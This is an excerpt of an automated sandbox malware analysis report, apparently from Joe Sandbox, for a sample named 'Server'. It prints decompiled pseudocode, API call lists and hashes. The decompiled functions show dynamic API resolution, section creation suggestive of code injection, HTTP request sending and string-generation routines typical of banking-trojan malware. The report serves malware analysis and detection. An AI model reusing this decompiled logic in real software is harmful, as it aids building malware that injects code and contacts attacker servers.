              • Part of subcall function 02025815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0202668E,253D7325,00000000,00000000,?,76B5C740,02023ECE), ref: 0202587C
              • Part of subcall function 02025815: sprintf.NTDLL ref: 0202589D
            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A0
            • lstrlen.KERNEL32(00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A8
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • strcpy.NTDLL ref: 020266BF
            • lstrcat.KERNEL32(00000000,00000000), ref: 020266CA
              • Part of subcall function 02025063: lstrlen.KERNEL32(00000000,00000000,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 02025074
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266E7
              • Part of subcall function 02024AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,020266F3,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 02024AD1
              • Part of subcall function 02024AC7: _snprintf.NTDLL ref: 02024B2F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
            • String ID: =
            • API String ID: 2864389247-1428090586
            • Opcode ID: e8e675b3b2a48e0f5507fa958083e69071adbbbaf064d8ea256c8f04812781e6
            • Instruction ID: e7acbfa1cb3f55d09b634e46699c396ea02e2ea9fb617c97f630fdeed1afaed3
            • Opcode Fuzzy Hash: e8e675b3b2a48e0f5507fa958083e69071adbbbaf064d8ea256c8f04812781e6
            • Instruction Fuzzy Hash: CF1191329113396B4722ABA89CC4CEE3AAEAF456643194057F904A7101DE69D90E6BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 435 401202-401214 call 4012e6 438 4012d5 435->438 439 40121a-40124f GetModuleHandleA GetProcAddress 435->439 440 4012dc-4012e3 438->440 441 401251-401265 GetProcAddress 439->441 442 4012cd-4012d3 call 401ba9 439->442 441->442 444 401267-40127b GetProcAddress 441->444 442->440 444->442 446 40127d-401291 GetProcAddress 444->446 446->442 447 401293-4012a7 GetProcAddress 446->447 447->442 448 4012a9-4012ba call 40110b 447->448 450 4012bf-4012c4 448->450 450->442 451 4012c6-4012cb 450->451 451->440
            C-Code - Quality: 100%
            			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v8;
            				_Unknown_base(*)()* _t29;
            				_Unknown_base(*)()* _t33;
            				_Unknown_base(*)()* _t36;
            				_Unknown_base(*)()* _t39;
            				_Unknown_base(*)()* _t42;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t50;
            				intOrPtr _t56;
            
            				_t56 = E004012E6(0x20);
            				if(_t56 == 0) {
            					_v8 = 8;
            				} else {
            					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
            					_v8 = 0x7f;
            					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
            					 *(_t56 + 0xc) = _t29;
            					if(_t29 == 0) {
            						L8:
            						E00401BA9(_t56);
            					} else {
            						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
            						 *(_t56 + 0x10) = _t33;
            						if(_t33 == 0) {
            							goto L8;
            						} else {
            							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
            							 *(_t56 + 0x14) = _t36;
            							if(_t36 == 0) {
            								goto L8;
            							} else {
            								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
            								 *(_t56 + 0x18) = _t39;
            								if(_t39 == 0) {
            									goto L8;
            								} else {
            									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
            									 *(_t56 + 0x1c) = _t42;
            									if(_t42 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t56 + 8)) = _a8;
            										 *((intOrPtr*)(_t56 + 4)) = _a4;
            										_t46 = E0040110B(_t56, _a12); // executed
            										_v8 = _t46;
            										if(_t46 != 0) {
            											goto L8;
            										} else {
            											 *_a16 = _t56;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}

            0x00401210
            0x00401214
            0x004012d5
            0x0040121a
            0x00401232
            0x00401241
            0x00401248
            0x0040124a
            0x0040124f
            0x004012cd
            0x004012ce
            0x00401251
            0x0040125e
            0x00401260
            0x00401265
            0x00000000
            0x00401267
            0x00401274
            0x00401276
            0x0040127b
            0x00000000
            0x0040127d
            0x0040128a
            0x0040128c
            0x00401291
            0x00000000
            0x00401293
            0x004012a0
            0x004012a2
            0x004012a7
            0x00000000
            0x004012a9
            0x004012af
            0x004012b5
            0x004012ba
            0x004012bf
            0x004012c4
            0x00000000
            0x004012c6
            0x004012c9
            0x004012c9
            0x004012c4
            0x004012a7
            0x00401291
            0x0040127b
            0x00401265
            0x0040124f
            0x004012e3

            APIs
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
            • String ID:
            • API String ID: 3012371009-0
            • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
            • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E020251D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
            				void* __esi;
            				long _t10;
            				void* _t18;
            				void* _t22;
            
            				_t9 = __eax;
            				_t22 = __eax;
            				if(_a4 != 0 && E02022058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
            					L9:
            					return GetLastError();
            				}
            				_t10 = E02027B83(_t9, _t18, _t22, _a8); // executed
            				if(_t10 == 0) {
            					ResetEvent( *(_t22 + 0x1c));
            					ResetEvent( *(_t22 + 0x20));
            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
            						SetEvent( *(_t22 + 0x1c));
            						goto L7;
            					} else {
            						_t10 = GetLastError();
            						if(_t10 == 0x3e5) {
            							L7:
            							_t10 = 0;
            						}
            					}
            				}
            				if(_t10 == 0xffffffff) {
            					goto L9;
            				}
            				return _t10;
            			}

            0x020251d8
            0x020251e5
            0x020251e7
            0x0202524a
            0x00000000
            0x0202524a
            0x020251ff
            0x02025206
            0x02025212
            0x02025217
            0x0202522d
            0x0202523d
            0x00000000
            0x0202522f
            0x0202522f
            0x02025236
            0x02025243
            0x02025243
            0x02025243
            0x02025236
            0x0202522d
            0x02025248
            0x00000000
            0x00000000
            0x0202524e

            APIs
            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,020221E7,?,?,746981D0,00000000), ref: 02025212
            • ResetEvent.KERNEL32(?), ref: 02025217
            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02025224
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02023F34,00000000,?,?), ref: 0202522F
            • GetLastError.KERNEL32(?,?,00000102,020221E7,?,?,746981D0,00000000), ref: 0202524A
              • Part of subcall function 02022058: lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,020251F7,?,?,?,?,00000102,020221E7,?,?,746981D0), ref: 02022064
              • Part of subcall function 02022058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,020251F7,?,?,?,?,00000102,020221E7,?), ref: 020220C2
              • Part of subcall function 02022058: lstrcpy.KERNEL32(00000000,00000000), ref: 020220D2
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02023F34,00000000,?), ref: 0202523D
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
            • String ID:
            • API String ID: 3739416942-0
            • Opcode ID: 7b27acdd099f91a648a2fe2294f1648862be17f15341e238ddfd664b1827f25a
            • Instruction ID: a9953bdde754ac4e226464e4304071ac3fcd6651613d373a0c3bad26c61e8b34
            • Opcode Fuzzy Hash: 7b27acdd099f91a648a2fe2294f1648862be17f15341e238ddfd664b1827f25a
            • Instruction Fuzzy Hash: C8016D31500324AED7726A61DC84F5BBBE9BF4A364FA10A27F595D10E0D720E81CEA29
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E02025364(void** __esi) {
            				intOrPtr _v0;
            				intOrPtr _t4;
            				intOrPtr _t6;
            				void* _t8;
            				void* _t9;
            				intOrPtr _t10;
            				void* _t11;
            				void** _t13;
            
            				_t13 = __esi;
            				_t4 =  *0x202a3cc; // 0x2ca9600
            				__imp__(_t4 + 0x40);
            				while(1) {
            					_t6 =  *0x202a3cc; // 0x2ca9600
            					_t1 = _t6 + 0x58; // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t8 =  *_t13;
            				if(_t8 != 0 && _t8 != 0x202a030) {
            					HeapFree( *0x202a2d8, 0, _t8);
            				}
            				_t9 = E020212C6(_v0, _t13); // executed
            				_t13[1] = _t9;
            				_t10 =  *0x202a3cc; // 0x2ca9600
            				_t11 = _t10 + 0x40;
            				__imp__(_t11);
            				return _t11;
            			}

            0x02025364
            0x02025364
            0x0202536d
            0x0202537d
            0x0202537d
            0x02025382
            0x02025387
            0x00000000
            0x00000000
            0x02025377
            0x02025377
            0x02025389
            0x0202538d
            0x0202539f
            0x0202539f
            0x020253aa
            0x020253af
            0x020253b2
            0x020253b7
            0x020253bb
            0x020253c1

            APIs
            • RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 0202536D
            • Sleep.KERNEL32(0000000A), ref: 02025377
            • HeapFree.KERNEL32(00000000,00000000), ref: 0202539F
            • RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 020253BB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uet
            • API String ID: 58946197-2766386878
            • Opcode ID: beea59919c06e81462bb648efaa3edb81a13e87197f3a954dedf5005c0b35ec7
            • Instruction ID: 18ca46f3e47839b046a997cd29e8c517fd6bf5ba5296cd132c1dc457c7e1640b
            • Opcode Fuzzy Hash: beea59919c06e81462bb648efaa3edb81a13e87197f3a954dedf5005c0b35ec7
            • Instruction Fuzzy Hash: 3DF03A71B403159FEB349B68DEC8F0A7BE5BB04340B225803B545D6261CB24D86CEA18
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E02022523(signed int __edx) {
            				signed int _v8;
            				long _v12;
            				CHAR* _v16;
            				long _v20;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t21;
            				CHAR* _t22;
            				CHAR* _t25;
            				intOrPtr _t26;
            				void* _t27;
            				void* _t31;
            				intOrPtr _t32;
            				void* _t33;
            				CHAR* _t37;
            				CHAR* _t43;
            				CHAR* _t44;
            				CHAR* _t45;
            				void* _t50;
            				void* _t52;
            				signed char _t57;
            				intOrPtr _t59;
            				signed int _t60;
            				void* _t64;
            				CHAR* _t68;
            				CHAR* _t69;
            				char* _t70;
            				void* _t71;
            
            				_t62 = __edx;
            				_v20 = 0;
            				_v8 = 0;
            				_v12 = 0;
            				_t21 = E02024520();
            				if(_t21 != 0) {
            					_t60 =  *0x202a2fc; // 0x2000000a
            					_t56 = (_t60 & 0xf0000000) + _t21;
            					 *0x202a2fc = (_t60 & 0xf0000000) + _t21;
            				}
            				_t22 =  *0x202a178(0, 2); // executed
            				_v16 = _t22;
            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
            					_t25 = E02023037( &_v8,  &_v20); // executed
            					_t55 = _t25;
            					_t26 =  *0x202a348; // 0xc7d5a8
            					if( *0x202a2fc > 5) {
            						_t8 = _t26 + 0x202b51d; // 0x4d283a53
            						_t27 = _t8;
            					} else {
            						_t7 = _t26 + 0x202b9db; // 0x44283a44
            						_t27 = _t7;
            					}
            					E02024332(_t27, _t27);
            					_t31 = E0202415A(_t62,  &_v20,  &_v12); // executed
            					if(_t31 == 0) {
            						CloseHandle(_v20);
            					}
            					_t64 = 5;
            					if(_t55 != _t64) {
            						_t32 = E020227A0();
            						 *0x202a310 =  *0x202a310 ^ 0x81bbe65d;
            						 *0x202a36c = _t32;
            						_t33 = E020233DC(0x60);
            						 *0x202a3cc = _t33;
            						__eflags = _t33;
            						if(_t33 == 0) {
            							_push(8);
            							_pop(0);
            						} else {
            							memset(_t33, 0, 0x60);
            							_t50 =  *0x202a3cc; // 0x2ca9600
            							_t71 = _t71 + 0xc;
            							__imp__(_t50 + 0x40);
            							_t52 =  *0x202a3cc; // 0x2ca9600
            							 *_t52 = 0x202b142;
            						}
            						_t55 = 0;
            						__eflags = 0;
            						if(0 == 0) {
            							_t37 = RtlAllocateHeap( *0x202a2d8, 0, 0x43);
            							 *0x202a368 = _t37;
            							__eflags = _t37;
            							if(_t37 == 0) {
            								_push(8);
            								_pop(0);
            							} else {
            								_t57 =  *0x202a2fc; // 0x2000000a
            								_t62 = _t57 & 0x000000ff;
            								_t59 =  *0x202a348; // 0xc7d5a8
            								_t13 = _t59 + 0x202b74a; // 0x697a6f4d
            								_t56 = _t13;
            								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x202927b);
            							}
            							_t55 = 0;
            							__eflags = 0;
            							if(0 == 0) {
            								asm("sbb eax, eax");
            								E02023BD3( ~_v8 &  *0x202a310, 0x202a00c); // executed
            								_t43 = E02021D8A(0, _t56, _t62, _t64, 0x202a00c); // executed
            								_t55 = _t43;
            								__eflags = _t55;
            								if(_t55 != 0) {
            									goto L30;
            								}
            								_t44 = E02026EA3(_t62); // executed
            								__eflags = _t44;
            								if(_t44 != 0) {
            									__eflags = _v8;
            									_t68 = _v12;
            									if(_v8 != 0) {
            										L29:
            										_t45 = E02026815(_t62, _t68, _v8); // executed
            										_t55 = _t45;
            										goto L30;
            									}
            									__eflags = _t68;
            									if(__eflags == 0) {
            										goto L30;
            									}
            									_t55 = E02025C31(__eflags,  &(_t68[4]));
            									__eflags = _t55;
            									if(_t55 == 0) {
            										goto L30;
            									}
            									goto L29;
            								}
            								_t55 = 8;
            							}
            						}
            					} else {
            						_t69 = _v12;
            						if(_t69 == 0) {
            							L30:
            							if(_v16 == 0 || _v16 == 1) {
            								 *0x202a17c();
            							}
            							goto L34;
            						}
            						_t70 =  &(_t69[4]);
            						do {
            						} while (E020223C4(_t64, _t70, 0, 1) == 0x4c7);
            					}
            					goto L30;
            				} else {
            					_t55 = _t22;
            					L34:
            					return _t55;
            				}
            			}

            0x02022523
            0x0202252d
            0x02022530
            0x02022533
            0x02022536
            0x0202253d
            0x0202253f
            0x0202254b
            0x0202254d
            0x0202254d
            0x02022556
            0x0202255c
            0x02022561
            0x0202257b
            0x02022587
            0x02022589
            0x0202258e
            0x02022598
            0x02022598
            0x02022590
            0x02022590
            0x02022590
            0x02022590
            0x0202259f
            0x020225ac
            0x020225b3
            0x020225b8
            0x020225b8
            0x020225c1
            0x020225c4
            0x020225ea
            0x020225ef
            0x020225fb
            0x02022600
            0x02022605
            0x0202260a
            0x0202260c
            0x02022638
            0x0202263a
            0x0202260e
            0x02022612
            0x02022617
            0x0202261c
            0x02022623
            0x02022629
            0x0202262e
            0x02022634
            0x0202263b
            0x0202263d
            0x0202263f
            0x0202264e
            0x02022654
            0x02022659
            0x0202265b
            0x0202268b
            0x0202268d
            0x0202265d
            0x0202265d
            0x02022663
            0x02022670
            0x02022676
            0x02022676
            0x0202267e
            0x02022687
            0x0202268e
            0x02022690
            0x02022692
            0x02022699
            0x020226a6
            0x020226ab
            0x020226b0
            0x020226b2
            0x020226b4
            0x00000000
            0x00000000
            0x020226b6
            0x020226bb
            0x020226bd
            0x020226c4
            0x020226c8
            0x020226cb
            0x020226e0
            0x020226e4
            0x020226e9
            0x00000000
            0x020226e9
            0x020226cd
            0x020226cf
            0x00000000
            0x00000000
            0x020226da
            0x020226dc
            0x020226de
            0x00000000
            0x00000000
            0x00000000
            0x020226de
            0x020226c1
            0x020226c1
            0x02022692
            0x020225c6
            0x020225c6
            0x020225cb
            0x020226eb
            0x020226f0
            0x020226f8
            0x020226f8
            0x00000000
            0x020226f0
            0x020225d1
            0x020225d4
            0x020225de
            0x020225e5
            0x00000000
            0x02022700
            0x02022700
            0x02022703
            0x02022707
            0x02022707

            APIs
              • Part of subcall function 02024520: GetModuleHandleA.KERNEL32(4C44544E,00000000,0202253B,00000001), ref: 0202452F
            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 020225B8
              • Part of subcall function 020227A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 020227C4
              • Part of subcall function 020227A0: wsprintfA.USER32 ref: 02022828
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • memset.NTDLL ref: 02022612
            • RtlInitializeCriticalSection.NTDLL(02CA95C0), ref: 02022623
              • Part of subcall function 02025C31: memset.NTDLL ref: 02025C4B
              • Part of subcall function 02025C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02025C91
              • Part of subcall function 02025C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02025C9C
            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0202264E
            • wsprintfA.USER32 ref: 0202267E
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
            • String ID:
            • API String ID: 1825273115-0
            • Opcode ID: ba151e16b35da0d790abcb05cc7660a55768f8a3703b6f3b1a09748b38eb3b24
            • Instruction ID: f03db4c6c6a11b9a0bf3378c2c9032b8ceae5509b19abc7b78d5655c0d8173b3
            • Opcode Fuzzy Hash: ba151e16b35da0d790abcb05cc7660a55768f8a3703b6f3b1a09748b38eb3b24
            • Instruction Fuzzy Hash: 1251C371F40335AFDB219BE4DD98B9E73E8BB04714F214857E901E6140DB78995CAF50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 22%
            			E02027040(signed int __eax, signed int _a4, signed int _a8) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				signed int _v20;
            				intOrPtr _t81;
            				char _t83;
            				signed int _t90;
            				signed int _t97;
            				signed int _t99;
            				char _t101;
            				unsigned int _t102;
            				intOrPtr _t103;
            				char* _t107;
            				signed int _t110;
            				signed int _t113;
            				signed int _t118;
            				signed int _t122;
            				intOrPtr _t124;
            
            				_t102 = _a8;
            				_t118 = 0;
            				_v20 = __eax;
            				_t122 = (_t102 >> 2) + 1;
            				_v8 = 0;
            				_a8 = 0;
            				_t81 = E020233DC(_t122 << 2);
            				_v16 = _t81;
            				if(_t81 == 0) {
            					_push(8);
            					_pop(0);
            					L37:
            					return 0;
            				}
            				_t107 = _a4;
            				_a4 = _t102;
            				_t113 = 0;
            				while(1) {
            					_t83 =  *_t107;
            					if(_t83 == 0) {
            						break;
            					}
            					if(_t83 == 0xd || _t83 == 0xa) {
            						if(_t118 != 0) {
            							if(_t118 > _v8) {
            								_v8 = _t118;
            							}
            							_a8 = _a8 + 1;
            							_t118 = 0;
            						}
            						 *_t107 = 0;
            						goto L16;
            					} else {
            						if(_t118 != 0) {
            							L10:
            							_t118 = _t118 + 1;
            							L16:
            							_t107 = _t107 + 1;
            							_t15 =  &_a4;
            							 *_t15 = _a4 - 1;
            							if( *_t15 != 0) {
            								continue;
            							}
            							break;
            						}
            						if(_t113 == _t122) {
            							L21:
            							if(_a8 <= 0x20) {
            								_push(0xb);
            								L34:
            								_pop(0);
            								L35:
            								E020261DA(_v16);
            								goto L37;
            							}
            							_t24 = _v8 + 5; // 0xcdd8d2f8
            							_t103 = E020233DC((_v8 + _t24) * _a8 + 4);
            							if(_t103 == 0) {
            								_push(8);
            								goto L34;
            							}
            							_t90 = _a8;
            							_a4 = _a4 & 0x00000000;
            							_v8 = _v8 & 0x00000000;
            							_t124 = _t103 + _t90 * 4;
            							if(_t90 <= 0) {
            								L31:
            								 *0x202a318 = _t103;
            								goto L35;
            							}
            							do {
            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
            								_v12 = _v12 & 0x00000000;
            								if(_a4 <= 0) {
            									goto L30;
            								} else {
            									goto L26;
            								}
            								while(1) {
            									L26:
            									_t99 = _v12;
            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
            									if(_t99 == 0) {
            										break;
            									}
            									_v12 = _v12 + 1;
            									if(_v12 < _a4) {
            										continue;
            									}
            									goto L30;
            								}
            								_v8 = _v8 - 1;
            								L30:
            								_t97 = _a4;
            								_a4 = _a4 + 1;
            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
            								__imp__(_t124);
            								_v8 = _v8 + 1;
            								_t124 = _t124 + _t97 + 1;
            							} while (_v8 < _a8);
            							goto L31;
            						}
            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
            						_t101 = _t83;
            						if(_t83 - 0x61 <= 0x19) {
            							_t101 = _t101 - 0x20;
            						}
            						 *_t107 = _t101;
            						_t113 = _t113 + 1;
            						goto L10;
            					}
            				}
            				if(_t118 != 0) {
            					if(_t118 > _v8) {
            						_v8 = _t118;
            					}
            					_a8 = _a8 + 1;
            				}
            				goto L21;
            			}


            APIs
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • lstrcpy.KERNEL32(43175AC4,00000020), ref: 0202713D
            • lstrcat.KERNEL32(43175AC4,00000020), ref: 02027152
            • lstrcmp.KERNEL32(00000000,43175AC4), ref: 02027169
            • lstrlen.KERNEL32(43175AC4), ref: 0202718D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
            • String ID:
            • API String ID: 3214092121-3916222277
            • Opcode ID: 56407d537915a1f4412727cd1b4c6ae14a67b0cfcb3d698f2f64f5e47c86b8ac
            • Instruction ID: f89dda93a12015918ae91f2d8877db156ec0fda2710bb99a6c5f80018f49cd60
            • Opcode Fuzzy Hash: 56407d537915a1f4412727cd1b4c6ae14a67b0cfcb3d698f2f64f5e47c86b8ac
            • Instruction Fuzzy Hash: 2F51C171A00328EFDF22CF99C4846ADFBB6FF41318F15805BE8159B225C770AA19DB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			_entry_() {
            				void* _t1;
            				int _t4;
            				int _t6;
            
            				_t6 = 0;
            				_t1 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x404160 = _t1;
            				if(_t1 != 0) {
            					 *0x404170 = GetModuleHandleA(0);
            					GetCommandLineW(); // executed
            					_t4 = E004019F1(); // executed
            					_t6 = _t4;
            					HeapDestroy( *0x404160);
            				}
            				ExitProcess(_t6);
            			}

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
            • GetCommandLineW.KERNEL32 ref: 00401E06
              • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
              • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
              • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
              • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
              • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • HeapDestroy.KERNEL32 ref: 00401E19
            • ExitProcess.KERNEL32 ref: 00401E20
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
            • String ID:
            • API String ID: 1863574965-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
